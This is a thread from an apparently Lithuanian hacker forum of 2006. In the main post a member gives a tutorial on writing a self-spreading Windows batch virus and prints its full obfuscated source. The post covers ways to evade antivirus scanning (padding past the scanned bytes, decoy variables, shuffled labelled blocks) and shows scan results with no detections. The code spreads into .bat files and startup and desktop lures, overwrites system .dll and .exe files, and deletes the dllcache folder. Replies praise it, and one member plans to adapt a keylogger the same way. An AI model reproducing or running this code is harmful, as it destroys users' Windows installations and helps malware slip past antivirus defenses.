bat scriptai

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
Vartotojo avataras
re-2
įtakingas
įtakingas
Pranešimai:109
Užsiregistravo:2005 09 27 14:02

#46 Standartinė re-2 » 2006 11 15 17:54

del C:\Docume~1\Alluse~1\startm~1\programs\startup tavofailas.exe

Vartotojo avataras
zigzag
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:495
Užsiregistravo:2006 04 28 17:26
Miestas:siauliai

#47 Standartinė zigzag » 2006 11 15 18:00

aciu.ir kur istraukei sita?

Vartotojo avataras
re-2
įtakingas
įtakingas
Pranešimai:109
Užsiregistravo:2005 09 27 14:02

#48 Standartinė re-2 » 2006 11 15 18:03

zigzag rašė:aciu.ir kur istraukei sita?
is seno tutorialo apie bat virusa

Vartotojo avataras
zigzag
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:495
Užsiregistravo:2006 04 28 17:26
Miestas:siauliai

#49 Standartinė zigzag » 2006 11 15 18:23

galetum papostint?

Vartotojo avataras
re-2
įtakingas
įtakingas
Pranešimai:109
Užsiregistravo:2005 09 27 14:02

#50 Standartinė re-2 » 2006 11 16 17:40

Seriously evil shit (rimtai blogas meљlas (љudas)) - tai paprastas BATCH skriptas, kuriame sudejau visas savo ћinias apie tokio tipo virusus. Taigi dabar jus supaћindinsiu su љiuo ћveriuku ir jo ypatumai. Nu ћodћiu paaiљkinsiu kas ir kaip. Kodel pasirinkau butent BATCH skripta? Ћinau kad tai mm, sakykim vaikiљka taciau palyginus galima padaryt konkrecia ћala. Kaip aљ megstu sakyt - "Lame, but evil" ;]. Na betkokiu atveju љia programa galiu vadinti virusu, bet apie tai veliau.

Ideja paraљyti toki virusa man kilo kai pamaciau kad Kasperskio antivirusine (toliau KAV) turi viena rimta buga - skanuodama ir tikrindama .bat failus KAV nuskaito tik pirma 1000 failo baitu. Iљ to darom logine iљvada kad net ir pat blogiausias kodas po tu 1000 baitu bus nenuskanuotas. Tai suprates aљ iљkart atsidariau notepada ir pradejau raљyt.
Pradejau nuo, mano manymu, svarbiausio viruso elemento - dauginimosi. Љia tema aiљku galima daug filosofuoti bet sakykim kad butent tai ir yra svarbiausia. Taigi:

for %%v in (*.bat) do copy %0 %%v

Aha, tai veikia taciau esant tokiam kodui jums rodys kad yra virusas. Praktiљkai tai kiekvienas kodas kuriame yra 'copy %0' jau yra laikomas virusu ;]. Taigi KAV man praneљe kad tai yra virusas kuri jie pavadino 'BAT.Silly.d'. Na pasinaudojes tuo bugu aљ perraљiau ta koda kiek kitaip:

speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.

for %%v in (*.bat) do copy %0 %%v

Ir ka jus manot? Ћinoma - kasperskis apsikakojo :P. Aiљku tai atrodo kiek kvailai, bet efektas genialus.
Savaime suprantama aљ tokiais dalykais nepasitenkinau. Dar pritaikiau viena technika su tam tikru komandu slepimu kintamuosiuose. Pvz.:

set SitasFailas=%0
for %%v i (*.bat) do copy %SitasFailas% %%v

Na va. Jeigu anksciau buvai susidures su tokio tipo programelemis turejai pastebet kad nera sudetinga skaityti ir analizuoti koda. Na todel pritaikiau dar kelias technikas. Visu pirma tai padariau toki pat bairi kaip ir su %0, taciau љiuo atveju pakeiciau funkcijas. Na pvz.:

set kopijavimas=copy
%kopijavimas% %SitasFailas% C:\Docume~1\Alluse~1\Desktop\big_tits.jpg.bat

Prieљ tokia apgaule kai kurios AV turi apsaugas. Jos pradeda ieљkoti kintamojo reikљmes nuo kodo pradћios ir jei ja randa ima vietoj to kintamojo, nu ћodћiu neverta perdaug gilintis... Taigi, ka mums tokiu atveju daryt? Na tai padirbam ta musu instrukcija ir tiek... ;]

set kopijavimas=meshlas
set kopijavimas=copy

Taigi AV paims pirma kintamojo reikљme ir ja uћskaitys kaip ta kurios reikia, o mes netiketai ja pakeisim poto. Na љitas metodas apsaugo grynai nuo heuristines viruso analizes. Kad dar labiau suљikt AV gyvenima pritaikysim 'kodo paskirstymo i blokus ir iљmetymo' technika (labelius gi tenais ne iљ nemokejimo dejau ;]). Cia va kodo gabaliukas kad suprastum esme:

:b3
%ciklas_for% %%v in (*.bat) do %kopijavimas% %SitasFailas% %%v
goto b4

:b4
%kopijavimas% %SitasFailas% C:\Docume~1\Alluse~1\Desktop\big_tits.jpg.bat
goto b5

:b5
%kopijavimas% %SitasFailas% C:\Docume~1\Alluse~1\startm~1\programs\startup\nice_ass.jpg.bat
goto b6

Blokai cia pateikti nesumaiљyti (veliau juos labai smagiai sumaiљiau). Toliau dar, gal to visai ir nereikejo, taciau nusprendћiau pritaikyt pseudo atsitiktiniu nesamoniu prigrudima. Tai atrodytu taip:

s%pseudo_meshlas%e%pseudo_meshlas%t SitasFailas%pseudo_meshlas%=%pseudo_meshlas%betkoksmeshlas
s%pseudo_meshlas%e%pseudo_meshlas%t SitasFailas%pseudo_meshlas%=%pseudo_meshlas%%0

Taip - tai paprastas kintamasis ivairiausiose vietose. Ћymiai pasunkina kodo analizavima, o ka jau kalbet apie heuristine analize.
Na toliau nutariau kur ir kaip prikopijuot љi faila, kuriuos folderius iљtrint ir kuriuos failus perraљyt. Aiљku galejau daryt 'deltree C:\windows' bet gi banalu ;] Beje, љio viruso patiems paleisti ant savo kompo, mm, na sakykim, nepatarciau... Na o dabar visas kodas:


speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.
speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.speedcore.

@echo off

goto b1

:b8
%kopijavimas% %SitasFailas% C:\Windows\System\*.dll
goto b9

:b2
%kopijavimas% %SitasFailas% C:\*.bat
goto b22

:b1
s%pseudo_meshlas%e%pseudo_meshlas%t SitasFailas%pseudo_meshlas%=%pseudo_meshlas%betkoksmeshlas
s%pseudo_meshlas%e%pseudo_meshlas%t SitasFailas%pseudo_meshlas%=%pseudo_meshlas%%0
goto b11

:b7
%trinimas% C:\Windows\system32\dllcache
goto b8

:b4
%kopijavimas% %SitasFailas% C:\Docume~1\Alluse~1\Desktop\big_tits.jpg.bat
goto b5

:b22
s%pseudo_meshlas%e%pseudo_meshlas%t ciklas_for%pseudo_meshlas%=%pseudo_meshlas%belekas
s%pseudo_meshlas%e%pseudo_meshlas%t ciklas_for%pseudo_meshlas%=%pseudo_meshlas%for
goto b3

:b3
%ciklas_for%%pseudo_meshlas% %%v i%pseudo_meshlas%n (*.bat) %pseudo_meshlas%d%pseudo_meshlas%o %kopijavimas%%pseudo_meshlas% %SitasFailas%%pseudo_meshlas% %%v
goto b4

:b6
s%pseudo_meshlas%e%pseudo_meshlas%t trinimas%pseudo_meshlas%=%pseudo_meshlas%eertled
s%pseudo_meshlas%e%pseudo_meshlas%t trinimas%pseudo_meshlas%=%pseudo_meshlas%deltree
goto b7

:b9
%kopijavimas% %SitasFailas% C:\Windows\*.exe
goto end

:b5
%kopijavimas% %SitasFailas% C:\Docume~1\Alluse~1\startm~1\programs\startup\nice_ass.jpg.bat
goto b6

:b11
s%pseudo_meshlas%e%pseudo_meshlas%t kopijavimas%pseudo_meshlas%=%pseudo_meshlas%meshlas
s%pseudo_meshlas%e%pseudo_meshlas%t kopijavimas%pseudo_meshlas%=%pseudo_meshlas%copy
goto b2

:end


Nu kaip matai nieko perdaug ypatingo, bet tai veikia ir tuo labiau - daro blogus dalykus. Dar noreciau biљki pakomentuot viena eilute:

%kopijavimas% %SitasFailas% C:\Windows\*.exe

Nenoredamas daryti kanors kita (tingedamas) papraљciausiai padariau taip. Failus perraљo vadinasi gerai. Nu iљtrint tai kaћkaip nemandagu, geriau perraљyt ;]. Taigi dar tureciau pasakyt kodel trinu dllcache direktorija. Na [o0] man pasake kad jei iљtrinsi/sugadinsi koki sistemini faila ji bandys atkurti iљ tos direktorijos, jei jos neras praљys windousu cd.
Pabaigai dar pateiksiu tokia lentele kuria man parode Jotti's malware scan 2.42 :

File: seriously_evil_shit.bat
Status: OK
Packers detected: None

AntiVir No viruses found (0.14 seconds taken)
Avast No viruses found (1.51 seconds taken)
BitDefender No viruses found (0.34 seconds taken)
ClamAV No viruses found (0.36 seconds taken)
Dr.Web No viruses found (0.53 seconds taken)
F-Prot Antivirus No viruses found (0.06 seconds taken)
Kaspersky Anti-Virus No viruses found (0.63 seconds taken)
mks_vir No viruses found (0.20 seconds taken)
NOD32 No viruses found (0.37 seconds taken)
Norman Virus Control No viruses found (0.13 seconds taken)

Kaip matai - ne viena iљ geriausiu AV programu nieko nerado.

####################################################################################################

Aciu [o0] uћ palaikyma ir pagalba ;]
Linkejimai taltes ir used2 teamams ir visiems tiems ћmoniems kurie padaro mano gyvenima bent љiek tiek prasmingu.

tai kas rasoma apie antivirusus jau senai nebe tiesa.

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#51 Standartinė ^Paulius^ » 2006 11 16 17:55

O ka bendrai visas virusas daro :?:

MaksasMks
ultra dalyvis
ultra dalyvis
Pranešimai:590
Užsiregistravo:2005 12 30 22:20

#52 Standartinė MaksasMks » 2006 11 16 20:10

:) geras tas seriously_evil_shit
Get your ambition or die trying

Vartotojo avataras
Dreigons
rašytojas profesionalas
rašytojas profesionalas
Pranešimai:364
Užsiregistravo:2006 01 18 13:11
Miestas:Kursenai

#53 Standartinė Dreigons » 2006 11 16 21:13

Re-2 dekui uz puikia info. :)

Reikes bandyti kazka panasaus nuveikti su keylogo sourcu. 8)

Vartotojo avataras
re-2
įtakingas
įtakingas
Pranešimai:109
Užsiregistravo:2005 09 27 14:02

#54 Standartinė re-2 » 2006 11 17 18:05

^Paulius^ rašė:O ka bendrai visas virusas daro :?:
atidziau skaitik viskas aiskiai parasita

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#55 Standartinė ^Paulius^ » 2006 11 17 19:25

Tai ten parasyta ka kiekviena eilute konkreciai padaro, o as klausiu kaip pats virusas pakenkia kompui. Ne ka padaro, o kuo pakenkia (Ka sugadina, kas nebeveikia, etc.) :?

Vartotojo avataras
re-2
įtakingas
įtakingas
Pranešimai:109
Užsiregistravo:2005 09 27 14:02

#56 Standartinė re-2 » 2006 11 18 11:03

^Paulius^ rašė:Tai ten parasyta ka kiekviena eilute konkreciai padaro, o as klausiu kaip pats virusas pakenkia kompui. Ne ka padaro, o kuo pakenkia (Ka sugadina, kas nebeveikia, etc.) :?
nieko blogo jis nepadaro tik nukuopijuoja save i desktopa, startupa , win direktorija ir peraso dllcache direktorija....

sis virusas pateiktas tik pazintiniais tikslais parodyti kaip tokie virusai rasomi.

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#57 Standartinė ^Paulius^ » 2006 11 18 21:32

Perzvelgiau viska siame forume apie batch skriptus ir neradau atsakymo i man rupincius klausimus. Stai man iskile klausimeliai:
1.Ka reikia rasyti, kad *.bat skripta paleidus susikurtu failas tam paciame folder`yje?
2. Ka reikia rasyti, kad paleidus *.bat skripta susikurtu failas nurodytame folder`yje?
3. Kaip rekia nurodyti kas bus tame faile?
Na, va. Tikiuosi sulaukti atsakymu. :roll:

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#58 Standartinė GODhack » 2006 11 18 21:46

Nlb supratau tavo klausimo tu nori tekstinio failo ar kokio?
Failus kuria parprastai kokia nors programa, o ne DOS.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#59 Standartinė ^Paulius^ » 2006 11 18 21:59

GODhack rašė:Nlb supratau tavo klausimo tu nori tekstinio failo ar kokio?
Failus kuria parprastai kokia nors programa, o ne DOS.
Man reikia *.bat falo skripto. :)

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#60 Standartinė GODhack » 2006 11 19 00:17

Nea bet tai koks failas susikurtu....
ai zodziu kas susikurtu tau nieko neiseis kas geriausia tai galima atsikopint ar atsisiust per kur nors jau sukurta.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 2 ir 0 svečių